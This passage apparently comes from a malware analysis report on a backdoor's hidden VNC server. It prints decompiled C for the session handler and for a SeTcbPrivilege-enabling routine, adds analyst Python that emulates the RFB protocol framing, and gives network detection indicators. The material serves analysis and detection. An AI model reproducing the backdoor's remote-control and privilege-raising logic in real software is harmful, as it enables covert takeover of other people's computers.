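    everything the server sends is appended to `outbound`."""

    def __init__(self, inbound: bytes):
        self.inbound = bytearray(inbound)
        self.outbound = bytearray()

    def recv_exact(self, n: int) -> bytes:
        if len(self.inbound) < n:
            raise HandshakeError(f"peer closed, wanted {n} bytes")
        chunk = bytes(self.inbound[:n])
        del self.inbound[:n]
        return chunk

    def send(self, data: bytes) -> None:
        self.outbound += data


def server_handshake(t: MemoryTransport, width: int, height: int,
                     fmt: PixelFormat, name: bytes) -> bool:
    """Run the RFB 3.3 server-side handshake; returns the client's 'shared' flag."""
    t.send(PROTOCOL_VERSION)
    parse_client_version(t.recv_exact(12))
    t.send(struct.pack(">I", SECURITY_NONE))    # in 3.3 the server dictates the type
    shared = t.recv_exact(1)[0] != 0            # ClientInit: the shared-flag byte
    t.send(build_server_init(width, height, fmt, name))
    return shared


if __name__ == "__main__":
    # Constructed client input: a 3.3 version reply followed by ClientInit(shared=1).
    t = MemoryTransport(b"RFB 003.003\n\x01")
    print("shared:", server_handshake(t, 1024, 768, PixelFormat(), b"desktop"))
    print(parse_server_init(bytes(t.outbound)[16:]))
```

Two points carry over to detection: a 3.3 server that selects security type None never sends a SecurityResult, so the whole handshake is 16 bytes from the server plus ServerInit, and a listener in a process that has no business serving VNC is the signal; the version string "RFB 003.003\n" on an outbound or inbound connection is also a cheap network indicator, since legitimate servers built this decade advertise 3.7 or 3.8.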

    C-Code - Quality: 70%
    			E004117CB(void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, signed char _a15, void* _a16) {
    				signed int _v8;
    				signed int _v13;
    				signed short _v15;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				char _v31;
    				signed int _v32;
    				signed int _v36;
    				short _v41;
    				short _v43;
    				char _v44;
    				char _v49;
    				char _v52;
    				char _v53;
    				char _v56;
    				char _v60;
    				signed int _v64;
    				char _v77;
    				char _v78;
    				unsigned int _v80;
    				signed int _v84;
    				char _v100;
    				signed short _v102;
    				signed short _v104;
    				signed int _v109;
    				char _v112;
    				char _v116;
    				char _v124;
    				char _v380;
    				void* __edi;
    				void* __esi;
    				void* _t205;
    				char _t206;
    				void* _t208;
    				signed char _t212;
    				unsigned int _t220;
    				signed int _t225;
    				signed int _t257;
    				signed int _t261;
    				signed int _t262;
    				void* _t264;
    				signed int _t265;
    				void* _t274;
    				void* _t280;
    				signed int _t288;
    				signed int _t289;
    				void* _t291;
    				signed int _t292;
    				signed short _t296;
    				unsigned int _t297;
    				signed int _t300;
    				signed int _t301;
    				signed int _t303;
    				intOrPtr _t305;
    				signed int _t309;
    				void* _t311;
    				signed int _t312;
    				signed int _t316;
    				signed int _t318;
    				signed int _t319;
    				void* _t321;
    				signed int _t322;
    				signed int _t329;
    				void* _t331;
    				signed int _t332;
    				signed int _t333;
    				signed char _t335;
    				void* _t352;
    				signed int _t353;
    				void* _t355;
    				signed int _t356;
    				signed int _t366;
    				signed int _t375;
    				signed int _t382;
    				signed int _t389;
    				signed int _t390;
    				unsigned int _t426;
    				signed char _t442;
    				signed char _t444;
    				signed char _t446;
    				signed int _t452;
    				signed int _t461;
    				void* _t472;
    				signed int _t479;
    				signed int _t490;
    				signed int _t491;
    				signed int _t496;
    				char _t505;
    				intOrPtr _t506;
    				signed int _t507;
    				signed short _t509;
    				intOrPtr* _t517;
    				signed int _t525;
    				void* _t527;
    
    				_t506 = _a8;
    				_t206 = E00409EAF(_t205, _a4, "RFB 003.003\n", 0xc);
    				if(_t206 == 0) {
    					L107:
    					return _t206;
    				}
    				_push(0x1b7740);
    				_push( &_v60);
    				_t208 = 0xc;
    				_t206 = E00409E38(_t208, _a4);
    				if(_t206 == 0) {
    					goto L107;
    				}
    				_push( &_v60);
    				_t472 = 4;
    				_t206 = E004079E8(_t472, "RFB ", _t472);
    				if(_t206 != 0) {
    					goto L107;
    				}
    				_v53 = _t206;
    				_v49 = _t206;
    				_t212 = E00407504( &_v52, "RFB ", 0);
    				_t206 = ((E00407504( &_v56, "RFB ", 0) & 0x000000ff | (_t212 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
    				if(_t206 > 0x300) {
    					goto L107;
    				} else {
    					_v24 = _v24 & 0x00000000;
    					_v20 = 1;
    					 *((intOrPtr*)(_t506 + 4))( &_v24);
    					_t220 = _v20;
    					_t479 = (_t220 & 0x0000ff00 | _t220 << 0x00000010) << 8;
    					_t399 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
    					_v36 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
    					if(E00409EAF( &_v36, _a4,  &_v36, 4) == 0) {
    						_v20 = _v20 | 0xffffffff;
    					}
    					_t225 = _v20;
    					if(_t225 == 0) {
    						return E00411765(_t399, __eflags, _a4, _v24);
    					}
    					_t206 = _t225 - 1;
    					if(_t206 != 0) {
    						goto L107;
    					}
    					_t206 = E00409E38(1, _a4,  &_v31, 0x1b7740);
    					if(_t206 == 0) {
    						goto L107;
    					}
    					_t206 =  *((intOrPtr*)(_t506 + 8))();
    					if(_t206 == 0) {
    						goto L107;
    					}
    					_v36 = _v36 & 0x00000000;
    					_t206 =  *((intOrPtr*)(_t506 + 0xc))( &_v124);
    					_t403 = _t206;
    					_t541 = _t206;
    					if(_t206 == 0) {
    						goto L107;
    					}
    					_t206 = E004115A4( &_v124, _t403,  &_v36, _t541, _a12);
    					_t505 = _t206;
    					if(_t505 == 0) {
    						goto L107;
    					}
    					_t507 = E004079C2(_v36);
    					_v104 =  *(_t505 + 8) << 0x00000008 |  *(_t505 + 9) & 0x000000ff;
    					_v102 =  *(_t505 + 0xa) << 0x00000008 |  *(_t505 + 0xb) & 0x000000ff;
    					_v84 = (_t507 & 0x00ff0000 | _t507 >> 0x00000010) >> 0x00000008 | (_t507 << 0x00000010 | _t507 & 0x0000ff00) << 0x00000008;
    					_t44 = _t505 + 0x20; // 0x20
    					E00406EC1( &_v100, _t44, 0x10);
    					asm("rol word [ebp-0x5c], 0x8");
    					asm("rol word [ebp-0x5a], 0x8");
    					asm("rol word [ebp-0x58], 0x8");
    					if(E00409EAF( &_v104, _a4,  &_v104, 0x18) == 0 || _t507 > 0 && E00409EAF(_t247, _a4, _v36, _t507) == 0) {
    						return E00411732(_t505);
    					} else {
    						_v41 = 0xffff;
    						_v44 = 0;
    						_v43 = 0xffff;
    						E00406F38( &_v380,  &_v380, 0, 0xff);
    						E00406F38( &_v380,  &_v380, 0, 0xff);
    						_v8 = 0;
    						_v20 = 0;
    						goto L16;
    						do {
    							while(1) {
    								L16:
    								_t375 = _v8;
    								_t509 = 0;
    								if(_t375 <= 0) {
    									goto L35;
    								}
    								L17:
    								_t274 = E0040A135(0,  &_a4, 0x12c, 0);
    								if(_t274 != 0xffffffff) {
    									goto L35;
    								}
    								__imp__#111();
    								if(_t274 != 0x274c) {
    									L104:
    									E00411732(_t505);
    									return E00406E85(_v20);
    								}
    								if(_a16 != 0) {
    									WaitForSingleObject(_a16, 0xffffffff);
    								}
    								 *((intOrPtr*)(_a8 + 0x10))();
    								_v28 = _t509;
    								if(_t375 <= _t509) {
    									L33:
    									if(_a16 != _t509) {
    										ReleaseMutex(_a16);
    									}
    									continue;
    									do {
    										while(1) {
    											L16:
    											_t375 = _v8;
    											_t509 = 0;
    											if(_t375 <= 0) {
    												goto L35;
    											}
    											goto L17;
    										}
    										L90:
    										__eflags =  *(_t505 + 0x1c);
    									} while ( *(_t505 + 0x1c) != 0);
    									break;
    								} else {
    									_v24 = _t509;
    									_t390 = _t375 * 9;
    									do {
    										_t527 = _v24 + _v20;
    										if( *((short*)(_t527 + 5)) > 0 &&  *((short*)(_t527 + 7)) > 0) {
    											_push(_t527);
    											_push(_a4);
    											_t280 = E0041123C(_t505);
    											if(_t280 == 0xffffffff || _t280 == 0) {
    												__eflags = _a16;
    												if(_a16 != 0) {
    													ReleaseMutex(_a16);
    												}
    												goto L104;
    											} else {
    												if(_t280 == 1) {
    													_t283 = _v28 + 1;
    													if(_v28 + 1 != _v8) {
    														E00406F38(_t283, _t527, 0, 9);
    													} else {
    														_v8 = _v8 - 1;
    														_t390 = _t390 - 9;
    														E00406E10(_t390,  &_v20);
    													}
    												}
    												goto L31;
    											}
    										}
    										L31:
    										_v28 = _v28 + 1;
    										_v24 = _v24 + 9;
    									} while (_v28 < _v8);
    									_t509 = 0;
    									goto L33;
    								}
    								L35:
    								_t376 = _a4;
    								_t414 = _a4;
    								_t257 = E00409E38(1, _a4,  &_a15, 0x1b7740);
    								__eflags = _t257;
    								if(_t257 == 0) {
    									goto L104;
    								}
    								_t261 = _a15 & 0x000000ff;
    								__eflags = _t261;
    								if(_t261 == 0) {
    									_t262 = E00409E80(_t414, _t376, 3, 0x1b7740);
    									__eflags = _t262;
    									if(_t262 == 0) {
    										goto L104;
    									}
    									_push(0x1b7740);
    									_push( &_v80);
    									_t264 = 0x10;
    									_t265 = E00409E38(_t264, _t376);
    									__eflags = _t265;
    									if(_t265 == 0) {
    										goto L104;
    									}
    									__eflags = _v80 - 0x20;
    									if(_v80 == 0x20) {
    										L99:
    										__eflags = _v77;
    										if(_v77 == 0) {
    											goto L104;
    										}
    										asm("rol word [ebp-0x48], 0x8");
    										asm("rol word [ebp-0x46], 0x8");
    										asm("rol word [ebp-0x44], 0x8");
    										__eflags = _v78;
    										_v78 = _t265 & 0xffffff00 | _v78 != 0x00000000;
    										_t196 = _t505 + 0x31; // 0x31
    										_v77 = 1;
    										E00406EC1(_t196,  &_v80, 0x10);
    										 *(_t505 + 0x41) = _v80 >> 3;
    										while(1) {
    											L16:
    											_t375 = _v8;
    											_t509 = 0;
    											if(_t375 <= 0) {
    												goto L35;
    											}
    											goto L17;
    										}
    									}
    									__eflags = _v80 - 0x10;
    									if(_v80 == 0x10) {
    										goto L99;
    									}
    									__eflags = _v80 - 8;
    									if(_v80 != 8) {
    										goto L104;
    									}
    									goto L99;
    								}
    								_t288 = _t261;
    								__eflags = _t288;
    								if(_t288 == 0) {
    									_t289 = E00409E80(_t414, _t376, 1, 0x1b7740);
    									__eflags = _t289;
    									if(_t289 == 0) {
    										goto L104;
    									}
    									_push(0x1b7740);
    									_push( &_v32);
    									_t291 = 2;
    									_t292 = E00409E38(_t291, _t376);
    									__eflags = _t292;
    									if(_t292 == 0) {
    										goto L104;
    									}
    									 *(_t505 + 0x4c) =  *(_t505 + 0x4c) & 0x00000000;
    									_t296 = (_v32 & 0xff) << 0x00000008 | (_v32 & 0x0000ffff) >> 0x00000008;
    									 *(_t505 + 0x48) = _t296;
    									__eflags = _t296;
    									if(_t296 == 0) {
    										L89:
    										_t297 =  *(_t505 + 0x4c);
    										_t490 = (_t297 << 0x00000010 | _t297 & 0x0000ff00) << 0x00000008 | _t297 >> 0x00000008 & 0x0000ff00 |  *(_t505 + 0x4f) & 0x000000ff;
    										 *(_t505 + 0x50) = _t490;
    										__eflags = _t297 - 5;
    										if(_t297 != 5) {
    											E00406E85( *(_t505 + 0x1c));
    											 *(_t505 + 0x1c) =  *(_t505 + 0x1c) & 0x00000000;
    											while(1) {
    												L16:
    												_t375 = _v8;
    												_t509 = 0;
    												if(_t375 <= 0) {
    													goto L35;
    												}
    												goto L17;
    											}
    										}
    										goto L90;
    									}
    									_t378 = (_t296 & 0x0000ffff) << 2;
    									_t161 = _t505 + 0x44; // 0x44
    									_t517 = _t161;
    									_t301 = E00406E10((_t296 & 0x0000ffff) << 2, _t517);
    									__eflags = _t301;
    									if(_t301 == 0) {
    										goto L104;
    									}
    									_t303 = E00409E38(_t378, _a4,  *_t517, 0x1b7740);
    									__eflags = _t303;
    									if(_t303 == 0) {
    										goto L104;
    									}
    									_v28 = _v28 & 0x00000000;
    									__eflags = 0 -  *(_t505 + 0x48);
    									if(0 >=  *(_t505 + 0x48)) {
    										goto L89;
    									}
    									_t305 =  *_t517;
    									do {
    										_t491 = _v28 & 0x0000ffff;
    										 *(_t305 + _t491 * 4) = ( *(_t305 + _t491 * 4) << 0x00000010 |  *(_t305 + _t491 * 4) & 0x0000ff00) << 0x00000008 | (_t305 + _t491 * 4)[0] & 0x000000ff |  *(_t305 + _t491 * 4) >> 0x00000008 & 0x0000ff00;
    										_t305 =  *((intOrPtr*)(_t505 + 0x44));
    										_t426 = 5;
    										__eflags =  *(_t305 + _t491 * 4) - _t426;
    										if( *(_t305 + _t491 * 4) == _t426) {
    											 *(_t505 + 0x4c) = _t426;
    										}
    										_v28 = _v28 + 1;
    										__eflags = _v28 -  *(_t505 + 0x48);
    									} while (_v28 <  *(_t505 + 0x48));
    									goto L89;
    								}
    								_t309 = _t288 - 1;
    								__eflags = _t309;
    								if(_t309 == 0) {
    									_push(0x1b7740);
    									_push( &_v56);
    									_t311 = 9;
    									_t312 = E00409E38(_t311, _t376);
    									__eflags = _t312;
    									if(_t312 == 0) {
    										goto L104;
    									}
    									asm("rol word [ebp-0x33], 0x8");
    									asm("rol word [ebp-0x31], 0x8");
    									asm("rol word [ebp-0x2f], 0x8");
    									asm("rol word [ebp-0x2d], 0x8");
    									__eflags = _v56;
    									_t382 = 0;
    									_v56 = _t312 & 0xffffff00 | _v56 != 0x00000000;
    									__eflags = _v8;
    									if(_v8 <= 0) {
    										L76:
    										__eflags = _t382 - _v8;
    										if(_t382 != _v8) {
    											L78:
    											E00406EC1(_t382 * 9 + _v20,  &_v56, 9);
    											while(1) {
    												L16:
    												_t375 = _v8;
    												_t509 = 0;
    												if(_t375 <= 0) {
    													goto L35;
    												}
    												goto L17;
    											}
    											goto L35;
    										}
    										_v8 = _v8 + 1;
    										_t316 = E00406E10(_v8 * 9,  &_v20);
    										__eflags = _t316;
    										if(_t316 == 0) {
    											goto L104;
    										}
    										goto L78;
    									}
    									_t318 = _v20 + 7;
    									__eflags = _t318;
    									do {
    										__eflags =  *(_t318 - 2);
    										if( *(_t318 - 2) != 0) {
    											goto L75;
    										}
    										__eflags =  *_t318;
    										if( *_t318 == 0) {
    											goto L76;
    										}
    										L75:
    										_t382 = _t382 + 1;
    										_t318 = _t318 + 9;
    										__eflags = _t382 - _v8;
    									} while (_t382 < _v8);
    									goto L76;
    								}
    								_t319 = _t309 - 1;
    								__eflags = _t319;
    								if(_t319 == 0) {
    									_push(0x1b7740);
    									_push( &_v112);
    									_t321 = 7;
    									_t322 = E00409E38(_t321, _t376);
    									__eflags = _t322;
    									if(_t322 == 0) {
    										goto L104;
    									}
    									__eflags = _v112;
    									_t490 = (_v109 & 0x00ff0000 | _v109 >> 0x00000010) >> 0x00000008 | (_v109 << 0x00000010 | _v109 & 0x0000ff00) << 0x00000008;
    									 *((intOrPtr*)(_a8 + 0x14))((_t322 & 0xffffff00 | _v112 != 0x00000000) & 0x000000ff);
    									continue;
    								}
    								_t329 = _t319 - 1;
    								__eflags = _t329;
    								if(_t329 == 0) {
    									_push(0x1b7740);
    									_push( &_v16);
    									_t331 = 5;
    									_t332 = E00409E38(_t331, _t376);
    									__eflags = _t332;
    									if(_t332 == 0) {
    										goto L104;
    									}
    									asm("rol word [ebp-0xb], 0x8");
    									asm("rol word [ebp-0x9], 0x8");
    									_v24 = _v24 & 0x00000000;
    									_t525 = 0x8000;
    									_t333 = GetSystemMetrics(0x17);
    									__eflags = _t333;
    									_t496 = _t490 & 0xffffff00 | _t333 != 0x00000000;
    									__eflags = _v15 - _v43;
    									if(_v15 != _v43) {
    										L50:
    										_t525 = 0x8001;
    										L51:
    										_t335 = _v44;
    										_t442 = _v16 & 0x00000001;
    										__eflags = _t442 - (_t335 & 0x00000001);
    										if(_t442 != (_t335 & 0x00000001)) {
    											__eflags = _t442;
    											if(_t442 == 0) {
    												__eflags = _t496;
    												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
    												__eflags = _t461;
    											} else {
    												__eflags = _t496;
    												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
    											}
    											_t525 = _t525 | _t461;
    											__eflags = _t525;
    										}
    										_t444 = _v16 & 0x00000004;
    										__eflags = _t444 - (_t335 & 0x00000004);
    										if(_t444 != (_t335 & 0x00000004)) {
    											__eflags = _t444;
    											if(_t444 == 0) {
    												__eflags = _t496;
    												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
    												__eflags = _t452;
    											} else {
    												__eflags = _t496;
    												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
    											}
    											_t525 = _t525 | _t452;
    											__eflags = _t525;
    										}
    										_t446 = _v16 & 0x00000002;
    										__eflags = _t446 - (_t335 & 0x00000002);
    										if(_t446 != (_t335 & 0x00000002)) {
    											__eflags = _t446;
    											_t525 = _t525 | ((0 | _t446 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
    											__eflags = _t525;
    										}
    										__eflags = _v16 & 0x00000008;
    										if((_v16 & 0x00000008) != 0) {
    											_t525 = _t525 | 0x00000800;
    											__eflags = _t525;
    											_v24 = 0x78;
    										}
    										__eflags = _v16 & 0x00000010;
    										if((_v16 & 0x00000010) != 0) {
    											_t525 = _t525 | 0x00000800;
    											__eflags = _t525;
    											_v24 = 0xffffff88;
    										}
    										E00406EC1( &_v44,  &_v16, 5);
    										_t490 = _t525;
    										 *((intOrPtr*)(_a8 + 0x18))(_v15 & 0x0000ffff, _v13 & 0x0000ffff, _v24);
    										continue;
    									}
    									__eflags = _v13 - _v41;
    									if(_v13 == _v41) {
    										goto L51;
    									}
    									goto L50;
    								}
    								__eflags = _t329 != 1;
    								if(_t329 != 1) {
    									goto L104;
    								}
    								_push(0x1b7740);
    								_push( &_v116);
    								_t352 = 3;
    								_t353 = E00409E38(_t352, _t376);
    								__eflags = _t353;
    								if(_t353 == 0) {
    									goto L104;
    								}
    								_push(0x1b7740);
    								_push( &_v64);
    								_t355 = 4;
    								_t356 = E00409E38(_t355, _t376);
    								__eflags = _t356;
    								if(_t356 == 0) {
    									goto L104;
    								}
    								_v64 = (_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008;
    								_t389 = E00406E55(((_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008) + 1);
    								__eflags = _t389;
    								if(_t389 == 0) {
    									E00406E85(0);
    									goto L104;
    								}
    								_t366 = E00409E38(_v64, _a4, _t389, 0x1b7740);
    								__eflags = _t366;
    								if(_t366 == 0) {
    									goto L104;
    								}
    								_t490 = _v64;
    								 *((intOrPtr*)(_a8 + 0x1c))(_t389);
    								E00406E85(_t389);
    							}
    							_t300 = E00406E55(0x400);
    							 *(_t505 + 0x1c) = _t300;
    							__eflags = _t300;
    						} while (_t300 != 0);
    						goto L104;
    					}
    				}
    			}
[Address column for this function (0x004117d6 to 0x00411fb6, one offset per decompiled line) spilled out of the interactive view and is omitted here.]

    APIs
      • Part of subcall function 00409EAF: send.WS2_32(?,?,?,00000000), ref: 00409EBD
    • WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,?,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 00411A2B
    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010), ref: 00411A46
    • ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010), ref: 00411AD8
    • GetSystemMetrics.USER32 ref: 00411BF2
      • Part of subcall function 00409E38: recv.WS2_32(?,?,00000004,00000000), ref: 00409E5C
    • ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010), ref: 00411F7E
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
• Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MutexRelease$ErrorFreeHeapLastMetricsObjectSingleSystemWaitrecvsend
    • String ID: $RFB $RFB 003.003$x
    • API String ID: 3911805420-914445781
    • Opcode ID: d2328708ad89c7747a7f0abc200d39da62e7f982d043513018a6762b3e87302c
    • Instruction ID: 803ec769d782a3ef37712938257643b9df2ed94de05b297d610e2456140eddce
    • Opcode Fuzzy Hash: d2328708ad89c7747a7f0abc200d39da62e7f982d043513018a6762b3e87302c
    • Instruction Fuzzy Hash: 9F32E231A00219AADF24DFA4C845BFEBBB5EF44344F04412BEA55A72D2DB389D85C798
    Uniqueness

    Uniqueness Score: -1.00%
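The decompiled function above is the server side of an RFB 3.3 (VNC) session: it sends `RFB 003.003\n`, parses the client's version and requires `(major << 8 | minor) - 0x303` to be at most 0x300 (an unsigned compare, so anything below 3.3 also fails), offers a single security type in which only the value 1 (None) lets the session continue, reads the one-byte ClientInit, sends a 24-byte ServerInit followed by the desktop name, and then dispatches client message types 0 to 5 by their fixed RFB sizes (recv 3+16, 1+2+4n, 9, 7, 5 and 3+4+n bytes). The PointerEvent branch converts button-mask changes into Win32 mouse_event flags, honouring SM_SWAPBUTTON (GetSystemMetrics(0x17)). The Python below is an added example written for this report, not code from the sample or from any VNC project: it reimplements that framing and the pointer mapping so an analyst can decode a captured session or check the version arithmetic offline. Message and field names are mine; the 0x1b7740 argument to the recv helper is assumed to be a timeout and is not modelled; all sample messages in the test are constructed.

```python
"""RFB 3.3 server-side framing as seen in the decompiled handler (added example)."""
import struct

SERVER_VERSION = b"RFB 003.003\n"   # 12 bytes, sent first
SECURITY_NONE = 1                   # only value on which this code path proceeds


def version_ok(client_version: bytes) -> bool:
    """Replicate the version check: 'RFB ' prefix, then (major<<8|minor) - 0x303 <= 0x300
    using 32-bit unsigned arithmetic, i.e. versions 3.3 through 6.3 are accepted."""
    if len(client_version) != 12 or not client_version.startswith(b"RFB "):
        return False
    try:
        major, minor = int(client_version[4:7]), int(client_version[8:11])
    except ValueError:
        return False
    packed = ((major & 0xFF) << 8 | (minor & 0xFF)) & 0xFFFF
    return ((packed - 0x303) & 0xFFFFFFFF) <= 0x300


def server_init(width: int, height: int, pixel_format: bytes, name: bytes) -> bytes:
    """ServerInit: u16 width, u16 height, 16-byte PixelFormat, u32 name length, name.
    The fixed part is 0x18 bytes, matching the send length in the binary."""
    assert len(pixel_format) == 16
    return struct.pack(">HH", width, height) + pixel_format + struct.pack(">I", len(name)) + name


def parse_client_message(buf: bytes):
    """Parse one client->server message. Returns (dict, bytes_consumed), or (None, 0)
    when buf is incomplete. Raises ValueError where the binary tears the session down:
    unknown type, or a pixel format whose bpp is not 8/16/32 or whose depth is 0."""
    if not buf:
        return None, 0
    mtype = buf[0]
    if mtype == 0 and len(buf) >= 20:                 # SetPixelFormat: 3 pad + 16 bytes
        pf = buf[4:20]
        bpp, depth, big_endian = pf[0], pf[1], pf[2]
        if bpp not in (8, 16, 32) or depth == 0:
            raise ValueError("rejected pixel format")
        rmax, gmax, bmax = struct.unpack(">HHH", pf[4:10])   # the three rol-by-8 words
        return {"type": "SetPixelFormat", "bpp": bpp, "depth": depth,
                "big_endian": big_endian != 0, "true_colour": True,  # binary forces 1
                "max": (rmax, gmax, bmax), "shift": tuple(pf[10:13]),
                "bytes_per_pixel": bpp >> 3}, 20                     # stored at +0x41
    if mtype == 1 and len(buf) >= 4:                  # SetEncodings: 1 pad + u16 count
        count = struct.unpack(">H", buf[2:4])[0]
        end = 4 + 4 * count
        if len(buf) >= end:
            encs = list(struct.unpack(">%di" % count, buf[4:end]))
            return {"type": "SetEncodings", "encodings": encs,
                    "hextile": 5 in encs}, end       # 5 keeps the 0x400-byte buffer at +0x1c
    if mtype == 2 and len(buf) >= 10:                 # FramebufferUpdateRequest: 9 bytes
        x, y, w, h = struct.unpack(">HHHH", buf[2:10])
        return {"type": "FramebufferUpdateRequest", "incremental": buf[1] != 0,
                "rect": (x, y, w, h)}, 10             # w == h == 0 marks a free pending slot
    if mtype == 3 and len(buf) >= 8:                  # KeyEvent: down, 2 pad, u32 keysym
        return {"type": "KeyEvent", "down": buf[1] != 0,
                "keysym": struct.unpack(">I", buf[4:8])[0]}, 8
    if mtype == 4 and len(buf) >= 6:                  # PointerEvent: mask, u16 x, u16 y
        x, y = struct.unpack(">HH", buf[2:6])
        return {"type": "PointerEvent", "mask": buf[1], "x": x, "y": y}, 6
    if mtype == 5 and len(buf) >= 8:                  # ClientCutText: 3 pad, u32 len, text
        n = struct.unpack(">I", buf[4:8])[0]
        if len(buf) >= 8 + n:
            return {"type": "ClientCutText", "text": buf[8:8 + n]}, 8 + n
    if mtype > 5:
        raise ValueError("unknown client message type %d" % mtype)
    return None, 0


def session_would_close(buf: bytes) -> bool:
    """True if the binary would drop the connection on this message."""
    try:
        parse_client_message(buf)
        return False
    except ValueError:
        return True


# Win32 mouse_event flags produced by the PointerEvent branch.
MOVE, ABSOLUTE, WHEEL = 0x0001, 0x8000, 0x0800
LEFTDOWN, LEFTUP, RIGHTDOWN, RIGHTUP, MIDDLEDOWN, MIDDLEUP = 0x02, 0x04, 0x08, 0x10, 0x20, 0x40


def pointer_to_mouse_event(prev, cur, swap_buttons=False):
    """Map an RFB PointerEvent to (mouse_event flags, wheel delta). prev/cur are
    (mask, x, y); the binary starts with prev = (0, 0xffff, 0xffff). swap_buttons models
    SM_SWAPBUTTON, which swaps buttons 1 and 3 but never the middle button."""
    pmask, px, py = prev
    mask, x, y = cur
    flags = ABSOLUTE | (MOVE if (x, y) != (px, py) else 0)
    delta = 0
    b1_down, b1_up = (RIGHTDOWN, RIGHTUP) if swap_buttons else (LEFTDOWN, LEFTUP)
    b3_down, b3_up = (LEFTDOWN, LEFTUP) if swap_buttons else (RIGHTDOWN, RIGHTUP)
    if (mask ^ pmask) & 0x01:
        flags |= b1_down if mask & 0x01 else b1_up
    if (mask ^ pmask) & 0x04:
        flags |= b3_down if mask & 0x04 else b3_up
    if (mask ^ pmask) & 0x02:
        flags |= MIDDLEDOWN if mask & 0x02 else MIDDLEUP
    if mask & 0x08:                                   # wheel up: WHEEL with +120 (0x78)
        flags, delta = flags | WHEEL, 120
    if mask & 0x10:                                   # wheel down: WHEEL with -120 (0xffffff88)
        flags, delta = flags | WHEEL, -120
    return flags, delta
```

In the binary the loop labelled L16 waits on the socket with E0040A135; when that returns -1 and WSAGetLastError() is 0x274c (WSAETIMEDOUT) it walks the list of pending FramebufferUpdateRequests under the mutex in _a16 and sends updates, and a request with a zero width and height is reused as a free slot. A listener that greets with `RFB 003.003\n` and accepts the handshake on security type 1 without any challenge is the behaviour an analyst can probe for when hunting this backdoor's port.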

    C-Code - Quality: 100%
    			E00408551(char _a4) {
    				void* _v12;
    				intOrPtr _v16;
    				struct _TOKEN_PRIVILEGES _v28;
    				int _t23;
    
    				_t1 =  &_v12; // 0x415b4a
    				_t23 = 0;
    				if(OpenThreadToken(GetCurrentThread(), 0x20, 0, _t1) != 0) {
    					L3:
    					_t4 =  &_a4; // 0x415b4a
    					_v28.PrivilegeCount = 1;
    					_v16 = 2;
    					if(LookupPrivilegeValueW(_t23,  *_t4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
    						_t23 = 1;
    					}
    					CloseHandle(_v12);
    					return _t23;
    				}
    				_t2 =  &_v12; // 0x415b4a
    				if(OpenProcessToken(0xffffffff, 0x20, _t2) != 0) {
    					goto L3;
    				}
    				return 0;
    			}

[Address column for this function (0x00408558 to 0x004085d2, one offset per decompiled line) spilled out of the interactive view and is omitted here.]

    APIs
    • GetCurrentThread.KERNEL32 ref: 00408561
    • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 00408568
    • OpenProcessToken.ADVAPI32(000000FF,00000020,J[A,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 0040857A
    • LookupPrivilegeValueW.ADVAPI32(00000000,J[A,?), ref: 0040859E
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 004085B3
    • GetLastError.KERNEL32(?,?,?,?,00415B4A,SeTcbPrivilege), ref: 004085BD
    • CloseHandle.KERNEL32(?,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 004085CC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
• Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
    • String ID: J[A$J[A
    • API String ID: 2724707430-1946466658
    • Opcode ID: 203217fa76ca3ec5beb62f85faa4907a1d9a1c5929ed13a02210a626fbed7837
    • Instruction ID: ebf7c0e00b4763a41d2ce7fff3d563090e94b58a61cb159bd475fd83f7f9ddf3
    • Opcode Fuzzy Hash: 203217fa76ca3ec5beb62f85faa4907a1d9a1c5929ed13a02210a626fbed7837
    • Instruction Fuzzy Hash: 19015275500208BFEB109FE1DE89EEF7BBCEB10344F00447AB941F11A0EB3589848A39
    Uniqueness

    Uniqueness Score: -1.00%

